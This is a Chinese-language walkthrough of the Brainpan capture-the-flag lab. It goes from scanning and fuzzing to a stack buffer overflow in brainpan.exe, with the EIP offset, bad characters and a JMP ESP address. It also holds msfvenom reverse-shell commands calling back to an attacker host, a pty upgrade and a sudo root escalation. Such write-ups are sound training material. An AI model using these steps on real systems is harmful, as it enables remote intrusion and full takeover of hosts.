主机发现

arp-scan -l

端口扫描

nmap --min-rate 10000 -p- 192.168.21.156

服务扫描

nmap -sV -sT -O -p9999,10000 192.168.21.156

这个地方感到了有点不对劲，python起来的一个web端口

漏洞扫描

nmap --script=vuln -p9999,10000 192.168.21.156

意料之中，先去看一下web的内容

这个就是一张图片，但是还是扫个目录看一下

dirb http://192.168.21.156:10000

这里有一个exe文件，想都不用想要下下来

文件没有什么问题

但是9999端口发现了点东西，web不能直接交互用nc连着试试

nc 192.168.21.156 9999

接下来只剩下一条线索（exe文件）

前面已经查看了文件有没有特殊的地方，接下来就剩下文件的内容了

strings brainpan.exe

后面还有很多，但是发现这个界面挺熟悉的，那么9999端口上运行的也是这个exe了

这里可能这个有用

[get_reply] copied %d bytes to buffer

Shitstorm

试一下

这里只是成功了但是没有看到什么，去windows试一下

试过之后发现

这里有复制字符串的函数这里很有可能出现溢出漏洞

这里写脚本吧

多跑几遍

这里发现600-700之间出现报错，那么软件是在600字节的时候崩的，需要再一次确定具体的字节数，利用不一样的字节来判断什么时候出现溢出

msf-pattern_create -l 600

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9

修改刚刚写的脚本

需要使用新的软件immunitydebugger

注意寄存器，需要吧缓冲区全部占满，然后吧我们的shell写进去

先运行脚本

注意要这个软件的exe文件在运行状态

这里只要看eip（这个是下一个指令的位置），记住eip的值

35724134

计算偏移量

msf-pattern_offset -l 600 -q 35724134

524字节填充eip

那么修改一下脚本

B和c（看看寄存器来确定b，剩下来的就是c的数据），再来运行程序

python2.7 yichu.py

堆栈的情况

Ascii编码（42 = b）（hex）

我们找到了eip，只需要在后面放入shell再将eip指向shell（350-400）就可以

修改脚本（扩容c）

只能多不能少

测试

计算字节数

一共468字节

去掉坏字符，不同的程序坏字符不一样，要去掉这些

去github来解决可能的坏字符问题

git clone GitHub - cytopia/badchars: Bad char generator to instruct encoders such as shikata-ga-nai to transform those to other chars.

./badchars -f ruby

修改脚本

进行测试

注意esp寄存器，右键follow in dump一下

在ff之后发现00且不是连续的证明有坏字节

此处只有00是坏字节

修改脚本（在前面的esp上面写出eip的地址）

查看jmp esp的代码

能找到brainpan的程序

发现安全机制都没有启用

这个找到的地址就能发现这个是esp指针就能重定向到esp去

0x311712f3

因为有大小端问题需要反写进入cpu（一般是小端）（字节倒序）

反弹shell编写

msfvenom -p windows/shell_reverse_tcp lhost=192.168.21.146 lport=666 -b "\x00" -e x86/shikata_ga_nai -f c

记得要用nop来空格解码

测试

成功

记得修改shell需要攻击靶机了

生成linux的shell

msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.21.146 lport=666 -b "\x00" -e x86/shikata_ga_nai -f c

修改脚本

测试

成功拿到

提升交互性

python -c "import pty;pty.spawn('/bin/bash')"

sudo -l

更具提示往没有密码的位置钻

这里有command可以去试试

直接一个/bin/bash抬走下一位

结束